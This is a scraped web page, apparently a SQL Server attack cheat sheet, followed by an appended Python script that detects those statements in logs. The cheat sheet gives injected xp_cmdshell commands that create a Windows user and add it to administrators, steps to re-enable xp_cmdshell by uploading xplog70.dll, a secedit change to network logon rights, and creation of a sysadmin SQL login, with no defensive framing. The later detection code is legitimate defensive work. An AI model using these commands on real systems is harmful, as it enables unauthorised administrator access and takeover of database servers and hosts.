Source: http://neeeao.com
exec master..xp_cmdshell "net user name password /add"--
; exec master..xp_cmdshell "net localgroup administrators name /add"--
SQL statement to enable xp_cmdshell
exec sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'
Check whether the extended stored procedure exists
select count(*) from master.dbo.sysobjects where xtype = 'X' and name = 'xp_cmdshell'
If the result is 1, OK
Restore xp_cmdshell
exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'; select count(*) from master.dbo.sysobjects where xtype = 'X' and name = 'xp_cmdshell'
If the result is 1, OK
Otherwise, upload xplog70.dll
exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'c:\winnt\system32\xplog70.dll'
SQL statement to disable xp_cmdshell
exec sp_dropextendedproc 'xp_cmdshell'
DOS:
dir c:\
dir d:\
dir e:\
net user TsinterNetUsers password /add
net localgroup administrators TsinterNetUsers /add
Backup recovery IPsec
secedit /export /cfg c:\tmp.inf
echo SeDenyNetworkLogonRight = >> c:\tmp.inf
secedit /configure /db c:\windows\secedit.sdb /cfg c:\tmp.inf
SQL:
exec master..sp_addlogin username, password
exec master..sp_addsrvrolemember username, sysadmin
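
Added example, not part of the original page: a Python detection pass a defender could run over captured SQL text (trace, audit, or web-request logs) to flag the statements listed above, regardless of casing, spacing, or inline comments. The rule names, the normalize and scan helpers, and the sample lines are constructed for illustration.

```python
import re

# Rules run on normalized text (comments stripped, lowercased, whitespace collapsed).
RULES = {
    "xp_cmdshell_exec": re.compile(
        r"\bexec(?:ute)?\s+(?:master\.(?:dbo)?\.)?xp_cmdshell\b"),
    "extended_proc_registered": re.compile(r"\b(?:sp_)?addextendedproc\b.*xp_cmdshell"),
    "extended_proc_dropped": re.compile(r"\bsp_dropextendedproc\b.*xp_cmdshell"),
    "extended_proc_probe": re.compile(r"\bsysobjects\b.*xtype\s*=\s*'x'.*xp_cmdshell"),
    "login_created": re.compile(r"\bsp_addlogin\b"),
    "sysadmin_granted": re.compile(r"\bsp_addsrvrolemember\b.*\bsysadmin\b"),
}


def normalize(stmt: str) -> str:
    """Undo the cosmetic variation that defeats naive substring matching."""
    s = re.sub(r"/\*.*?\*/", " ", stmt, flags=re.S)  # inline comments used as separators
    s = re.sub(r"\s+", " ", s.lower())                # case and whitespace runs
    s = re.sub(r"\s*\.\s*", ".", s)                   # "master . dbo" -> "master.dbo"
    return s.strip()


def scan(statements):
    """Return [(line_number, [rule, ...])] for statements matching any rule."""
    hits = []
    for n, stmt in enumerate(statements, start=1):
        text = normalize(stmt)
        matched = [name for name, rx in RULES.items() if rx.search(text)]
        if matched:
            hits.append((n, matched))
    return hits


# Constructed sample input: one statement per captured log line.
SAMPLE_LOG = [
    "SELECT name FROM dbo.customers WHERE id = 42",
    "EXEC  MASTER..XP_CMDSHELL 'dir c:/'",
    "exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'; "
    "select count(*) from master.dbo.sysobjects where xtype = 'X' and name = 'xp_cmdshell'",
    "Exec/**/master..sp_addsrvrolemember username, sysadmin",
    "exec sp_addsrvrolemember 'report_user', 'bulkadmin'",
]

if __name__ == "__main__":
    for line_no, rules in scan(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(rules)}")
```

The last sample line is deliberately not flagged: a role grant other than sysadmin does not match the sysadmin_granted rule.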